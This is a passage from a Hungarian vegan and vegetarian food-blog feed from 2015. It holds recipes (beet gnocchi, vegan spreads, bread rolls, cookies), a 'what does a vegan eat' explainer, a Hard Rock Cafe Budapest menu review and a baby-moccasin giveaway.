másfél-két éves, tehát 0-24 hónapos korig, benti- vagy kocsicipőnek, kúszó-mászónak és éppen elindulóknak, totyogóknak egyaránt. Mivel ilyen pici korban a babák lába szinte hónapról hónapra növekszik, ezért igazán praktikus és egyben költséghatékony megoldás is egy szép kis kézzel készült Tender Toes mokaszin, mely biztosítja az ilyenkor ortopéd orvosok által is javasolt mezítlábas érzést és a talp izomzatának egészséges fejlődését. Hol lehet találkozni a termékeiddel? A Facebook oldalamon, ahol jeleztem is, hogy karácsony közeledtével és születendő kisfiamra való tekintettel 2015. december 1-ig tudok rendeléseket felvenni, amelyeket legkésőbb december 15-én postázok, hogy garantáltan megérkezzen az ünnepekre, a fa alá a kis mokaszin. Ezenkívül december 5-én szombaton kint leszek a Pici Piacon, ahova sok szeretettel várok mindenkit. Erika elérhető az alábbi linken: – Tender Toes Baby Moccasins Facebook oldal ***** NYEREMÉNYJÁTÉK! Nyeremény : egy nyertes választhat egy pár Tender Toes lányos vagy fiús, bélelt mokaszint (hajpánttal vagy csokornyakkendővel) a kívánt méretben és színösszeállításban. Írjátok meg a bejegyzés alá kommentben, hogy nektek milyen szín összeállítású mokaszin tetszene! Kérem, hogy az alábbi formula minden pontját töltsétek ki! Vagyis a lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. Ha kommentáltatok a blogon, akkor utána a formulába klikkeljetek a szürke I commented! kockára, csak így érvényes a kommentetek. Ezenkívül lájkolni kell a Tender Toes és a Zizi kalandjai Facebook oldalakat. Ha még nem vagy ha már lájkoltátok a Facebook oldalakat, mindkét esetben klikk a kék Visit Us-ra a lájk után. a Rafflecopter giveaway Szabályok : 2015. november 26-ig lehet játszani. Eredményhirdetés 2015. november 27-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt Erika postázza magyarországi címre.
Meggyes kukoricaprósza
Bevallom, egészen idáig nem ismertem a prósza szó jelentését. Most is úgy találkoztam vele, hogy beneveztem egy gasztroblogger játékba, ahol a résztvevők egy nekik kisorsolt szakács receptjei közül választanak, és dokumentálva meg is főzik azt. Én szerencsétlenségemre (vagy szerencsémre?) ebben a játékban egy kiváló, és igazán hagyományos, húst-hússal főző gasztrobloggert kaptam párnak, akinek még az édességei is disznózsírral voltak lelocsolva. (nem, tényleg nem túlzok!) Viszont egy vegán konyhában nem volt egyszerű a receptjei közül választani. Elég tanácstalanul válogattam a receptjei között, amikor megakadt a szemem az egyiken: lekváros prósza. Na, mondom, ez valami ajurvédikus indiai lepény lesz. Vagy az a prána? Vagy a szakóca? (viccelek!) Aztán elkezdtem nyomozni utána, és akkor döbbentem meg igazán: a prósza régi magyar (szláv) édesség! Nagyon egyszerű elkészíteni, simán gluténmentes, és még vegánná alakítani is teljesen és pofon egyszerű. Megvan a nevező sütim! :) Hozzávalók egy 15 x 20 cm-es sütőformához: [...] Bővebben!
Mit eszik egy vegán?
2015. november 16. Vegán lettem
Sokszor futottam bele a “Mit eszik egy vegán?” kérdésbe és úgy gondolom, hogy ez a topik többet érdemel egy “Állati eredetű ételeken kívül mindent” válasznál. A “mit eszik egy vegán” a bejegyzéstől ne várj recept megfejtéseket, és konkrét tanácsokat reggeli-ebéd-vacsora témában. Jelen cikkem egyetlen célja, hogy rámutasson azokra a hétköznapi alapanyagokra, melyeket ma Magyarországon még sajnos nem feltétlen tekintünk hétköznapinak, pedig a tésztás, tejes és húsos pulttól csak egy köpésre vannak kedvenc hipermarketünkben, és bio boltokban is könnyen fellelhetőek. Amióta vegán életmódot folytatok, sokkal színesebben és változatosabban étkezem mint azelőtt. Ez betudható a korai (azonban mint az kiderült teljesen alaptalan) fehérje hiánnyal kapcsolatos félelmeimnek, valamint hogy a bezáruló hús, tej, tojás és tejtermék kapuk helyett rengeteg más kapu kényszerűen megnyílt. Ezek az ajtók eredetileg is ott voltak, nem lett több vagy kevesebb, de mint mindenki én is a megszokásaim rabja voltam és azt ettem amit gyerekkorom óta toltak elém és ami az éttermekben, ételbárokban kapható. Ezen felül amellett, hogy nagyon sok otthon is egyszerűen elkészíthető recept van az interneten, országszerte egyre-másra nyitnak a kifejezetten vegán és nyers vegán éttermek – ételbárok, mely helyeken csak olyan alapanyagokból dolgoznak melyeket eszik egy vegán. Szóval mit eszik egy vegán? Röviden összefoglalva egy vegán mindent fogyaszt és főzéshez minden felhasznál, ami nem állati származék. Zöldségekből és gyümölcsökből, hüvelyesekből és gabonafélékből, valamint magvakból és diófélékből készülő ételeket eszik egy vegán. Eme 6 alapvető alapanyag az emberi szervezet számára teljes értékű vegán étkezés szent grálja. A tudatosan étkező vegánok minden nap fogyasztanak magvakat, gabonaféléket (akár otthon összeállított müzli formájában), sötét és élénk színű zöldségeket, gyümölcsöket, valamint ugyancsak sűrűn hüvelyeseket. Továbbá erősen ajánlott mindenevőknek legfőképpen, hogy a napi étkezés 30-40%-át nyers zöldségek és gyümölcsök tegyék ki, a rostok bevitele miatt. A számunkra megszokott alapvető hús nélküli ételek mellett (mint például, a lecsó, a főzelékek, a hummusz, a rizs, a krumpli, vagy a babkészítmények) egyre divatosabbak az úgynevezett hamis ételek, mely a klasszikus húsos ételek helyettesítését szolgálják. Ilyenek a vegetáriánus hamburgerek, a hamis gulyás, a vegán felvágottak, a vegán kolbászok és vegetáriánus fasírtok. A hamis húsokat a legtöbb esetben gabonafélékből (tempeh és szejtán) vagy szójából készítik, így fehérjetartalmuk magasnak mondható. Azonban alapanyag vásárlásnál érdemes odafigyelni, mivel ami vegetáriánus az nem minden esetben vegán is. Számos vegetáriánus készítményt készítenek tojással, vagy tejtermékekkel. Egy régebbi cbejegyzésemben olvashatjátok, hogy mi a különbség vegetáriánus és vegán étrend között. Tej és tejszín helyett, mandula, kókusz, zab vagy szójatejtermékeket, míg a sajtok helyettesítésére szójából, diófélékből és tápiókából készült készítményeket eszik egy vegán. Vegán sajtokat kis gyakorlással otthon is könnyedén el lehet készíteni. Kifejezetten jópofa dolog tud lenni egy házilag elkészített teljesen vegán sajtos pizza. Mit eszik egy vegán reggelire ebédre és vacsira? Ahány vegán, annyi szokás. Nekem a reggelire müzli, magvak, gabonák; ebédre a főtt étel; vacsorára a nyers csodák jöttek be. Hogyan van ez bővebben: Mit eszik egy vegán reggelire Reggelire ahogy már említettem müzlit eszek. Piacon és bio boltban vásárlom meg a hozzávalókat körülbelül két hetente és keverem otthon össze. Változó arányban tartalmaz a reggelim zabot, puffasztott barna rizst, puffasztott tönköly búzát és egyéb gabonákat; mandulát, mogyorót, kesudiót és egyéb magvakat melyeket kimérve vásárolok; számos féle-fajta aszalt gyümölcsöt, melyeket ugyancsak kimérve vásárolok; valamint az előre bekevert müzlihez minden reggel olyan apróságokat keverek, mint a pattogatott amaránt, goji bogyó, lenmag, tökmag és hasonló apró magvak. (az apróbb magvakat, vagy minimálisan hőkezelem, vagy beáztatom előre, így segítve a hatékonyabb felszívódást) Mindezt zab, kókusz vagy mandulatejjel öntöm fel. Brutális energia bomba! Mit eszik egy vegán ebédre Az internet tele van jobbnál-jobb receptekkel és mivel én nem vagyok egy nagy szakács így konkrét megfejtéseket nem írok. Nekem az vált be, hogy ebédre jöhetnek a főtt ételek. Levesek, főzelékek minden mennyiségben, párolt és sült zöldségek, hagyományos magyar húsmentes és rakott ételek. Tápanyag bevitel szempontjából a köreten nagyon sok múlik és a megszokott krumpli, tészta, fehér rizs kombó nagyon gyengén muzsikál. Bátran készíts köretnek olyan, még mindig nem hétköznapinak számító ételeket, mint a bulgur, a csicseriborsó, quinoa, gersli, hajdina vagy a kuszkusz. Egyik kedvenc receptes blogom a kertkonyha. Mit eszik egy vegán vacsorára Vacsorára jöhetnek a nyers dolgok. Gyümölcs és zöldsaláták vagy tálak; élő zöld és gyümölcs vegyes turmixok; zöldségből készült mártogatósok, melyet hosszában szelt répával, szálzellerrel vagy akár almával tunkolhattok; vagy bármilyen úgynevezett élő ételek, melyeket a nyers vegánok fogyasztanak. Ezen ételek receptjeinek is elég komoly irodalma van már Magyarországon is, szóval receptekbe menően nem megyek bele. Én néha csak érzésből beledobok mindent a turmixgépbe. Fantasztikus dolgok jönnek ki belőle.
Margarin/vaj/májkrém/körözött helyett
2015. november 9. Vegán muflon
Mint ismeretes, a magyar állampolgár egy 2km-es buszút közben hajlamos éhen halni, ha nincs nála egy alufóliába csomagolt szalámis szendvics. Így hát az utazás ötödik másodpercében elő is veszi a ominózus rettenetet, és ötpercnyi zörgés után gondoskodik róla, hogy az egész jármű átható Pick-aromát árasszon. (Parasztok Wunderbaumja - mondaná a békétlen vegán.) Sőt, sokan egy nyomorult teleportot nem bírnának ki valami szocreál étvágycsökkentő nélkül. Ők remélhetőleg úgy végzik, mint Jeff Goldblum a Légyben, és rettenet hülyén fognak festeni, mikor génjeik egyesülnek a szalámis szendvics molekuláival. Szendvicskészítés terén Közép-Európa egyébként is feneketlen időcsapdában vergődik, ezért a laikusoknak most szeretnék gasztronómiai mentőkötelet dobni, melyekkel felválthatják a vajat/vajkrémet, margarint és a hozzájuk szervesen kapcsolódó állati származékokat. 1. Paprikakrém 2. Klasszikus padlizsánkrém 1 nagyobb darab padlizsán 1 nagy gerezd összetört fokhagyma 2 evőkanál olívaolaj só, bors A padlizsánt jó 15-20 percre 220 fokra előmelegített sütőbe tesszük, majd mikor ráncok tekintetében Keith Richardsra kezd hasonlítani, kivesszük. A szitkozódást elkerülendő, megvárjuk, míg kissé lehűl, és lehúzzuk a héját. Ekkor az összetevőkkel együtt egy tálba helyezzük, és botmixerrel összedolgozzuk. A közhiedelemmel ellentétben mustárt nem, majonézt pedig a legvégső esetben sem igényel. 3. Vegán kolbászkrém Paradoxonok nélkül mit sem ér az élet, ennek szellemében kéretik beszerezni az alábbiakat: 150 g (azaz fél csomag) füstölt tofu 1/2 fej vöröshagyma felcsíkozva 1 nagy gerezd összetört fokhagyma 1 kiskanál pirospaprika 1 kiskanál őrölt kömény 1 evőkanál szójaszósz 1 evőkanál olívaolaj só fél zöld hegyes erőspaprika felaprítva (opcionális) A tofut összetörjük, majd a többi alkotóelemmel együtt botmixerrel összemixeljük. 4. Humusz Az alsós környezetismeret-órán megismert humusszal csak akkor kínálgatjuk vendégeinket, ha utáljuk őket. Ha viszont valamilyen okból szimpatizálunk velük, akkor a közel-keleti specialitással állunk elő, és előkészítjük ezeket: 400 gramm beáztatott vagy konzerv csicseriborsó 1 evőkanál tahinikrém (avagy szezámkrém, házilag is előállítható) 1 nagy gerezd fokhagyma 1 kiskanál őrölt római kömény pár csepp citromlé pár csepp chiliszósz (opcionális) só, bors Az összetevőket egy tálba helyezzük, majd botmixerrel összedolgozzuk. Fontos, hogy a csicseriborsó levéből is használjunk egy keveset, különben szárazabb lesz, mint egy telek-adásvételi szerződés. (Tahini helyett mogyoróvajat is használhatunk, de ne áruljuk el senkinek!)
Az árpa hatásai
2015. november 3. Élj harmóniában
ÁrpaAz árpa az ősi idők óta, szinte minden kultúrában simert növény volt. Ma is elég ismert gabonaféle a világon és viszonylag olcsónak is számít. Leginkább árpagyöngy formában találkozhatunk vele, mely az árpamagok hántolásával és gőzölésével készül. Magyarországon gersli néven ismerik és sajnos nem elég gyakori a fogyasztása. Pedig árpa jól használható egytálételekbe, levesekbe vagy köretnek is kiváló. Az árpa rostokban, szénhidrátban és fehérjében is gazdag. Kedvezően hat az emésztésre és csökkenti a koleszterinszintet is. Vitaminokat és ásványi anyagokat is tartalmaz, mint kálium,kalcium, magnézium foszfor és B vitaminok. Az árpa fogyasztás hozzájárul a testi és szellemi teljesítőképesség növeléséhez és nyugtatja az idegrendszert is. Vízhajtó hatása miatt a népi gyógyászatban is használták. Mint minden gabonát az árpát is célszerű először szárazon kicsit pirítani és utána felönteni forróvízzel. Vegyszermentes (bio) árpát használj!
Hol egyek vegán sütit?
Vegán süti már szinte több helyen elérhető, mint vegán főétel. Ha nassolnál valami édeset, legyen az egy nyers torta vagy akár kedvenc süteményed vegán verziója, mindet megtalálod Magyarországon is. Nem csak Budapesten, de vidéken is terjednek a tej-, tojás- és mézmentes desszertek, amit egy finom smoothie-val vagy növényi tejeskávéval is leöblíthetsz. A térképen a bal […]
Zsömle
Eddig friss élesztőt használtam minden kelt tészta készítéshez. Londonban azonban csak porélesztővel (yeast), illetve instant élesztővel sikerült találkoznom (bár képeken már láttam friss élesztőt is), így a következő zsömléket is azzal készítettem. Kicsit tartottam tőle, hogy ha szokásomhoz híven nem teszek hozzá cukrot, akkor is felfut-e az élesztő, meg fog-e kelni a tészta, mint otthon, s jelentem, kiválóan működik! Ez az első kelt tésztám itt, Angliában. Az élesztőt Annamáriától, a Nagykőrösről érkezett szomszédomtól kaptam. (Meglehetősen sok magyar él a környékünkön is, ezt akkor is felfedezem, amikor egy üzletbe bemegyek és az eladó pl. magyar vagy a vásárlók egy része egymás közt magyarul beszél.) Tehát az alábbi recept különlegessége, amellett, hogy Londonban sütöttem, az, hogy porélesztőből készült, no és persze nem maradhatott ki a teljes kiőrlésű liszt sem. Elég egyszerű volt elkészíteni. A recept: Hozzávalók: 1 csomag száraz porélesztő 2,5 dl meleg víz 15 dkg teljes kiőrlésű liszt 25 dkg fehér liszt (BL-55) 2 evőkanál olaj 1 teáskanál só (nem púpozottan!) Elkészítés: Az élesztőt a keverőtálba szórjuk, majd ráöntjük a meleg vizet. Amikor az élesztő feloldódott a vízben, hozzáadjuk a liszteket, az olajat, és a sót. Elsőnek fakanállal összekeverjük a tésztát, amennyire tudjuk, majd kezünkkel keverjük, dagasztjuk tovább. Ha szükséges, pár csepp vizet még adunk hozzá. Amikor összeállt a tészta, és a kezünkkel való dagasztás során már elválik az edény falától, akkor az edényt kicsit kilisztezzük, majd a tésztát letakarjuk, meleg helyen pihentetjük legalább 30 percet. A kenyérsütőgép programjai közül kiválasztjuk azt, amelyik dagaszt és keleszt, de nem süt. Szép kis buci lesz belőle, mire a tészta megkel. Ezt követően gombócokat, zsemléket formálunk a kezünkkel, sütőpapíros tepsire rakjuk őket. Ismét letakarva kelesztjük őket addig, míg legalább duplájára nem dagadnak. Sütőben kb. 20 percig (180 fok, vagy közepes láng) sütjük, majd kivesszük és vízzel megspricceljük. Még sütjük úgy 5-10 percig, majd a kész zsemléket, amik akár hamburger nagyságú zsemlék is lesznek, rácson hagyjuk kihűlni.
Áfonyás zab
A következő ételt elsősorban reggelinek javaslom, de desszertnek is megállja a helyét. Előnye, hogy nagy főzési tudomány nem kell hozzá és végső soron az áfonya lecserélhető más gyümölcsre, vagy éppen fagyasztott áfonyát is használhatunk, miután kiengedett. Áfonyát leginkább lekvár formájában fogyasztanak Magyarországon az emberek, azt is sült (vad)húsokhoz, pörköltökhöz. (Tisztelet a kevés kivételnek, ha nem vegetáriánus és mégis használja másképp a konyhában!) Pedig az áfonyát érdemes minél gyakrabban fogyasztani, akár magában is. Sok vasat, A, C és D vitaminokat tartalmaz. Gazdag antioxidánsokban (szabadgyökök ellen véd tehát). Vérkeringési zavarok (pl. magas vérnyomás) valamint cukorbetegség is olyan retinaelváltozásokat eredményezhet, amelyek miatt a látás csökken. Egy 40 fős szembetegségtől szenvedő csoporttal vizsgálatot végeztek olasz kutatók 1987-ben. (Gentile A. (1987) Use of bilberry anthocyanosides to prevent hemorrhage in preparation for ENT surgery. Istituti Ospitalieri di Verona, Italy.) A fekete áfonya 80%-os javulást idézett elő a szem mikrokeringésében és a látásban is. Másik érdekesség már a II. világháború óta ismert, amikor brit pilóták fekete-áfonya lekvár fogyasztottak annak érdekében, hogy az éjszakai berepülésnél a látásuk pontosabb legyen. Kapilláris ereinket védjük mi is fekete áfonya fogyasztásával. A recept: Hozzávalók: - 1 bögrényi érett fekete-áfonya (fagyasztott is lehet) - 1 bögrényi zab - víz - 1 kis doboz natúr joghurt (pl: joya szója joghurt; édesített és nem édesített is jó, attól függően, ki mennyire édesszájú) Elkészítés: Előző este mossuk meg és áztassuk be a zabot egy éjszakára annyi vízben, amennyi jól ellepi. Reggel adjunk hozzá még vizet majd főzzük puhára. Amikor megfőtt, puhák a zabszemek, akkor kétféleképpen tálalhatjuk. Vagy az egészet összekeverjük a joghurttal és az áfonyával óvatosan, hogy az áfonyaszemek ne törjenek össze, vagy a tányérunkra teszünk zabot, a tetejére joghurtot, amit megszórunk áfonyával. Élelmi rostokban, vitaminokban, ásványi anyagokban gazdag reggelink lesz, ami segít egészségünk megőrzésében. Az áfonya miatt különösen ajánlom szembetegeknek, a zab miatt pedig cukorbetegeknek is. A zab gluténmentes gabona, tehát azoknak is remek táplálék, akik ilyen diétát folytatnak.
Vegán, "vajas"-meggyes keksz
2015. október 21. Mindennapi ételeink
Hozzávalók: 2,5 dl nyírfacukor 12,5 dl liszt 2 tk. vaníliás cukor 40 dkg kókuszzsír 1 citrom héja -- meggylekvár Elkészítés: A tészta hozzávalóit kimérjük, a citrom héját lereszeljük és mindezt összemorzsoljuk (a kókuszzsír legyen szoba hőmérsékletű), majd alaposan összedolgozzuk. Ezután kb. 4 cm átmérőjű hengereket formázunk belőle és letakarva hűtőbe tesszük. (Mélyhűtőbe téve eláll sokáig, bármikor előkapható). majd lisztezett felületre rakva a tetején a közepét hosszanti irányba kissé bemélyesztjük (van ilyen magyar szó? - kérdezi egy nyelvész....) -így lesz szív alakú a kekszünk, ez a rész opcionális-, majd fél centis köröket (szíveket) vágunk belőle, és sütőpapírral bélelt tepsibe tesszük. Megkenjük (a széleit szabadon hagyva) sűrű meggylekvárral, és egy kevés maradék tésztát rá is morzsolhatunk. (Én mandulaforgácsot is szoktam a lekvárra tenni). 180 fokon 15 perc alatt kisütjük.
Vegetáriánus/vegán menü a Hard Rock Cafe Budapestben
2015. október 16. Zizi kalandjai
Quinoa burger sültkrumplival A minap sajtóebédre voltam hivatalos a Hard Rock Cafeba. I. dolgozott, így vittem magammal Ádit is, szóval ő is tesztelte az új vegetáriánus/vegán menüt a Hard Rockban. Áldását adta, ízlettek neki az ételek! Összefutottunk az ebéden Mártival is, akinek ikerlányai vannak. Mondtam, hogy nem tudtam megoldani másképp a sajtóebédet csak úgy, hogy Ádit is hozom magammal. Elmesélte, hogy ő is vitte minden hasonló eseményre a lányait, amikor kisebbek voltak. Megnyugodtam, hogy nem én vagyok az egyetlen… és Ádi is megszokta már az ilyen eseményeket. Különben is, ha ételről van szó, akkor mindig jól viselkedik. A Hard Rock Cafe Budapest (és világszinten a többi Hard Rock Cafe is) azzal ünnepli az októberi Vegetáriánus Tudatosság Hónapját, hogy limitált ideig elérhető húsmentes opciókkal bővíti és újítja meg kínálatát. Az új menü a Vegetáriánus Tudatosság Hónapja tiszteletére készült, amelynek célja, hogy felhívja a figyelmet a vegetarianizmusra és a húsmentes étkezés előnyeire. A Vegetáriánus Világnapként indult kezdeményezés mára egész hónapos eseménnyé nőtte ki magát, amellyel a vegetarianizmust ünneplik. Az új fogások 2015. október 1-jén, a Vegetáriánus Világnapon indultak útjukra a világ különböző Hard Rock-jaiban több, mint 25 húsmentes ajánlattal, amelyek közül 3 juice, 2 burger, 2 wrap és 2 saláta a budapesti Hard Rock Cafe étlapjára is felkerült (kár, hogy nem több!). Az új ételeket a hónap végéig lehet megkóstolni, de a vendégek kedvencei remélhetőleg hosszútávon is az étlapra kerülnek majd. ,,Mivel a világon egyre többen választják a növényi alapú táplálkozást, ezért a vegetáriánus éttermi kínálatra is egyre nagyobb a kereslet - mondta Antonio Bautista, a Hard Rock International Franchise-üzemeltetésének senior igazgatóhelyettese. - ,,A Hard Rock Cafe a globális és a regionális konyhából merített a fogások megalkotásakor, amelyeket a vegetáriánusok és a húsimádók egyformán élvezetesnek fognak találni. Sült zöldséges saláta A Hard Rock Cafe klasszikus amerikai konyhán alapuló étlapjának csaknem minden kategóriájában megtalálhatóak a széleskörű igényeket lefedő opciók, amelyek között a vegán vendégek is találhatnak számukra megfelelőeket. Az új kínálat részei például az olyan innovatív fogások mint a quinoa burger vagy a fodroskel (leveleskel) saláta sült gyökérzöldségekkel. Az új kínálat a következőkből áll: – Fűszeres tofus feketebab tekercs: feketebab, barnarizs, lilahagyma, paprika, kukorica, koriander, paradicsom, jalapeno, fokhagyma, méz, fűszeres, grillezett tofuval, és fokhagymás krémmel (ez külön tálalva) — Finom nagyon, a jalapeno miatt enyhén csípős, a tofu is be van fűszerezve és a babbal párosítva ízletessé teszi a tekercset. – Ropogós karfiolos tekercs: rántott karfiol humusszal, paradicsommal, ecetes lilahagymával, fokhagymás olajjal, korianderrel, csilivel; vegyes salátával tálalva — Ez nem csípős, szóval még jobban bejött a karfiol humusz párosítás miatt. Kicsit sok volt benne a lilahagyma, így intenzív hagymás íze volt. – Sült zöldséges saláta: fodros kel (leveleskel), válogatott balzsamos gyökérzöldségek (cékla- és répafélék), fűszeres pekándió, tofu, és újhagyma, almaecetes öntettel — Sajnos Magyarországon nehezen beszerezhető a leveleskel, így Budapesten ezt a salátát kelkáposztával és lollo salátával készítik. A fűszeres pekándió a saláta tetején nagyon sós volt, ezen javítva igazán finom lesz a saláta és kiadós adag. Talán még jobban ízlett volna, ha a sült őszi zöldségek melegen lennének tálalva. – Sült céklás saláta: sült cékla szeletek spenótsaláta-ágyon, fetasajttal, karamellizalt pekándióval, mézes-balzsamos öntettel — Könnyedebb saláta, inkább köretként fogyasztanám, mint főételként. – Quinoa burger: friss zöldségpogácsa, helyben készítve; quinoaval, lilahagymával, gombával, tojással, Cheddar sajttal, pekándióval, árpával, szója szósszal és zsemlemorzsával, tetején humusszal, rukkolával, paradicsommal és grillezett lilahagymával — Ötletes megoldás a hamburger pogácsára a quinoa használata, jó, hogy túlléptek a zöldségek és grillezett kecskesajt variáción. – Padlizsán & Humusz Burger: grillezett padlizsán szeletek humusszal rétegezve, rukkolával, paradicsommal és lilahagymával — Nekem ez jobban ízlett, mint a quinoa burger. A padlizsán és humusz párosa nagyszerű és minden összetevőnek átjön az íze. Fűszeres tofus feketebab tekercs Az újítások része, hogy a Hard Rock Cafe Budapest kiterjedt, díjnyertes itallapja is új, tápláló italokkal bővül. Olyan juice-okat is megtalálhatunk a kínálatban mint a cékla-narancs-gyömbér, a saláta-alma vagy a spenót-ananász-lenmag turmix. — Mindegyik nagyon finom, talán a spenót-ananász-lenmag ízlett a legjobban, csak ennél figyelni kell arra, hogy minél hamarabb megigyuk, mert ugye a lenmag teljesen besűríti az italt, ha sokáig állni hagyjuk. Cékla-narancs-gyömbér juice Jónak tartom, hogy egy nemzetközi láncolat nyit a vegetáriánus és vegán étkezés irányába. Erre mindenképpen szükség van, noha tudom, hogy nehéz a vendéglátó helyeknek kielégíteni minden táplálkozási forma igényeit (pl: vegán, paleo, gluténmentes, stb.). A lényeg, hogy a láncolat felismerte a szükségességét és lassú léptekben elindult a változás. Remélem a Magyarországra behozott ételekből minél több felkerül majd az állandó étlapra is. *** Hard Rock Cafe Budapest 1051 Budapest Deák Ferenc utca 3-5. Weboldal Facebook *** Fotó kredit: Hard Rock Cafe Budapest
Céklás gnocchi, diós gorgonzola szószban, és minden hónap 29 - e Gnocchi nap (gluténmentes, tojásmentes)
2015. szeptember 30. Zöld Avocado
Nagyon szeretjük az olasz konyhát. Nálunk a pizzák és a spagettik után a gnocchi állna az "Olaszország leghíresebb és legfinomabb ételei" - nek képzeletbeli dobogóján. Ezek a kis krumpligombócok ma már a Világ minden táján nagy népszerűségnek örvendenek. Egyszerűen és változatosan elkészíthető, pénztárcabarát tésztaételről van szó, mely a helyi adottságokhoz, ízvilághoz, kultúrához és természeti kincsekhez alkalmazkodva, sok száz féle tésztából, és sok ezer féle szósszal elkészítető. (Enyhe túlzással... ;-) ) Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes) A gnocchik (ejtsd: nyokki) szülőföldjét Olaszországnak tulajdonítják, de a recept az évszázadok során sokat változott. Eredetileg a középkorban, nem is burgonyából, hanem búzadarából, rizslisztből, és száraz kenyérből készültek. A mai kor által leginkább ismert gombócok már buronyából születnek, és eredetük a 17. századba vezethető vissza. Spanyol felfedezők hozták be a krumplit Olaszországba, amit először csak kerti dísznövényként tartottak, majd az Európát sújtó éhínség hatására gyors térhódításba kezdett az olcsón termeszthető burgonya. Ezzel egyidőben a krumpligombóc, a krumplis gnocchi is elindult meghódítani a Világot. Bármerre járunk a Világban, nincs olyan olasz étterem, aminek az étlapján ne találkoznánk egy-egy gnocchis fogással. Az olasz bevándorlók világszerte meghonosították a gnocchi sokféle változatát. Az "ahány ház, annyi szokás" magyar közmondás tökéletesen jellemzi a gnocchi recepteket is. Még Olaszországon belül sem igazán találunk két egyforma gnocchi receptet, nemhogy a világ két különböző pontján. Természetesen mindenki a sajátját tartja az igazinak, a tökéletesnek, az eredetinek! ;-) Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes) Minden olasz régiónak (főleg az észak - olasz részen) megvan a saját tipikus gnocchi tésztája, és a kedvenc mártása hozzá. Míg Veronában jellemzően paradicsom szósszal tálalják a krumpligombócokat, addig Lombardia tartományban a sajtszószokra esküsznek. Szardínia szigetén különleges egytálétel a hagyományosan sáfránnyal ízesített ,,gnocchetti" is, mely a gnocchinál lényegesen kisebb méretű tésztával készül. Sok helyen nem is burgonyából, hanem zsemlemorzsából, kukoricadarából, és különböző lisztekből készítik a gnocchi tésztát. Általánosságban elmondható, hogy a jó gnocchi legfontosabb hozzávalója az alacsony víz- és magas szárazanyag- tartalmú, ún. lisztes burgonya, kevés grízes liszt, tojás és só. Az erőteljes ízű parmezán vagy gorgonzola sajt pedig szinte mindenütt elmaradhatatlan a tetejéről. Sok receptben lehet olvasni, hogy főzzük meg a burgonyát, de azok a receptek tévednek. A tökéletes, szájban szétolvadó, nem ragacsos gnoccihoz, a burgonyákat sütőben kell megsütni, hogy kevesebb vizet engedjenek ki magukból. Minél szárazabb a krumpli, annál jobb. A tökéletes gnocchi angol kifejezéssel élve "fluffy and melt in the mouth", ami magyarul nagyjából annyit tesz, hogy "bolyhos, pihés" gombócok melyek szétolvadnak a szádban. céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán) Annyira jól sikerült a gnocchi hódító hadjárata, hogy néhány szegényebb, dél-amerikai országban (pl.: Argentínában és Uruguayban) a hónap utolsó előtti napját ,,gnocchi-napnak nevezik. Mivel a hónap elején kapott fizetés elfogy a hónap végére, így már csak olcsó ételek kerülhetnek a vacsora asztalokra. A gnocchi tökéletes választás, ezért minden hónap 29-e a dél-amerikai országokban a hivatalos DIA DE ?OQUIS, a Gnocchi nap. Ilyenkor a családok, barátok összegyűlnek, és együtt fogyasztják el a gnocchit. Hogy szerencsét hozzon, mindenki tesz egy pénz érmét a tányérja alá, és ott is hagyják a vacsora végeztéig. Ez egyfajta szerencsehozó babona arrafelé. Egyes éttermekben ezen a napon csak gnocchis fogásokat lehet választani, míg más éttermek külön erre a napra szóló gnocchi specialitásokkal rukkolnak elő. céklás gnocchi (glutén-, laktóz-, tojásmentes, vegán) Magyarország, valószínűleg Mátyás király idejében ismerkedett meg olasz szakácsok által a gnocchi akkori verzióival. A magyar gasztronómia egyik fontos étele, a nokedli is feltehetően az olasz burgonyamentes gnocchi egyik leszármazottja, illetve a burgonyával készült változat (gnocchi di patate) nagy hasonlóságot mutat a magyar krumplinudlival. Készíthetjük villával bordázott változatban, vagy anélkül. Fogyaszthatjuk különböző mártásokkal, szószokkal, sajtokkal, zöldségragukkal, de akár édesen lekvárral vagy mákkal is. A hagyományos burgonyás gnocchi mellett számos más idény zöldséggel is feltúrbózhatjuk a gnocchikat, hogy szép színes, és tápanyagdús tésztákat kapjunk eredményül. A későbbiekben hozok nektek a Zöld Avocado vegetáriánus gasztroblogra egy sütőtökös és egy spenótos tészta változatot is, most pedig a szezonnak megfelelően egy egyszerűen elkészíthető céklás gnocchi receptjét osztom meg veletek. Korábban már bemutattam, hogyan készítsetek céklás nokedlit, most egy ahhoz hasonló, de mégis más, glutén- laktóz- és tojásmentes recept következik, a könnyebb emésztés jegyében, burgonya nélkül. (Természetesen a laktózmentesség csak a gnocchikra értendő. Amennyiben a gorgonzolás szószt készítjük el hozzá, a laktózmentesség nem állja meg a helyét. Laktózérzékenyek készítsenek sajtmentes szószt a céklás gnocchi mellé.) Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes) HOZZÁVALÓK (4 személyre): a vegán céklás gnocchihoz: - 300 g nyers céklapép (kb. 250 g nyers cékla + 1 dl tiszta víz) - 20 g lenmagliszt - 150 g (barna) rizsliszt - 1 tk Himalája só, őrölt fehér bors - 1/2 ek útifűmaghéj a diós gorgonzolás szószhoz: - 250 ml főzőtejszín - 200 g gorgonzola sajt - reszelt parmezán sajt a tetejére - 1 bögre dió (előre beáztatva 24 órára) - 1 marék friss petrezselyem - 2 gerezd fokhagyma - Himalája só, őrölt fehér bors, szárított oregánó - 1/2 citrom frissen facsart leve Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes) ELKÉSZÍTÉS:Kb. 250 g nyers céklát meghámozunk, és 1 dl vízzel krémesre turmixolunk. Egy tálba tesszük a liszteket, a fűszereket, az útifűmaghéjat, hozzáadjuk a céklapépet, és kézzel alaposan összegyúrjuk az egészet egy nagy gombóccá. Formázható, puha, nem túl lisztes, de nem is ragadós tésztát kell kapnunk. Olyat, ami már pont nem ragad bele a tálba, de még puha. (Használjunk még lisztet, ha kell, de ne gyúrjuk túl sokáig a tésztát). Hagyjuk pihenni 15 percet a hűtőben a tészta golyót. céklás gnocchi (glutén-, laktóz-, tojásmentes, vegán) Vágjuk fel 4, majd 8 felé a gombócot, és 